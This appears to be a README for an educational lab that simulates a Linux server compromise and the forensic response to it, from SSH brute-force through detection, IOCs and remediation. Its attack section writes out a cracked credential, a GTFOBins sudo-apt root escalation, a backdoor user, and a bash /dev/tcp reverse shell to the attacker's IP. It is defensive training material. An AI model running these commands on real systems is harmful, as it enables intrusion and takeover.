Linux-Server-Compromise-Forensic-Investigation-Lab

Simulated Linux server compromise with full attack chain, forensic analysis, and incident response (Red Team & Blue Team).

🔐 Linux Server Compromise & Forensic Investigation Lab

📌 Overview

This project simulates a complete cybersecurity incident on a Linux server, combining Red Team (attack) and Blue Team (defense) approaches.

The lab reproduces a realistic compromise scenario:

• Initial access via SSH brute-force
• Privilege escalation
• Persistence mechanisms
• Reverse shell communication
• Detection and forensic investigation
• Incident response and remediation

---

🖥️ Environment

Role	System	IP Address	Tools
Target Server	Ubuntu	192.168.252.133	UFW, Auditd, Fail2ban
Attacker	Kali Linux	192.168.252.135	Nmap, Hydra, Netcat

---

🎯 Objectives

• Harden a Linux server
• Simulate a real attack scenario
• Detect malicious activity via logs
• Perform forensic analysis
• Extract Indicators of Compromise (IOC)
• Apply incident response

---

🔐 Hardening Phase (Blue Team)

Implemented security measures:

• SSH Hardening:

  • PermitRootLogin no
  • MaxAuthTries 3

• Firewall configuration (UFW)

• Fail2ban protection (brute-force defense)

• Auditd monitoring:

  • /etc/passwd, /etc/shadow
  • sudo usage
  • process execution (execve)

• Log management using rsyslog

• Time synchronization (NTP)

---

⚔️ Attack Simulation (Red Team)

1. Reconnaissance

• Nmap scan → SSH service detected (port 22)

2. Brute-force Attack

• Tool: Hydra
• Wordlist: rockyou.txt
• Result:

alice : alice123

3. Initial Access

• SSH login using compromised credentials

4. Persistence

• Creation of malicious user:

hacker_user

5. Privilege Escalation

• Exploitation via GTFOBins:

sudo apt changelog apt
!/bin/bash

→ Root access obtained

6. Reverse Shell

bash -i >& /dev/tcp/192.168.252.135/4444 0>&1

---

🔍 Detection & Forensic Analysis

Auth Logs Analysis

• Hundreds of failed login attempts detected
• Successful login from attacker IP

Suspicious Activities

• sudo execution by user alice
• useradd used to create backdoor account

Auditd Analysis

• Detection of executed commands:

exe="/usr/bin/dash"

• Reverse shell activity identified

---

🚨 Indicators of Compromise (IOC)

• Attacker IP: 192.168.252.135

• Compromised user: alice

• Malicious user: hacker_user

• Suspicious commands:

  • sudo
  • useradd
  • bash

• Reverse shell on port 4444

---

🛡️ Incident Response

Containment

• Block attacker IP using UFW:

ufw deny from 192.168.252.135

Eradication

• Remove malicious users:

userdel -r hacker_user

Recovery

• Reset compromised password
• Remove dangerous sudo privileges

Verification

• No unauthorized users
• No SSH keys added
• No cron persistence

---

📊 Attack Timeline

Time	Event
22:14	Brute-force attack started
22:19	Successful login (alice)
22:21	Backdoor user created
22:23	Privilege escalation
22:25	Reverse shell established

---

📸 Evidence

Attack

Detection

Exploitation

Response

---

📁 Structure

• screenshots/ → execution evidence
• docs/ → detailed analysis
• logs/ → extracted logs and IOC
• report/ → full forensic report

---

⚠️ Disclaimer

This project was conducted in a controlled lab environment for educational purposes only.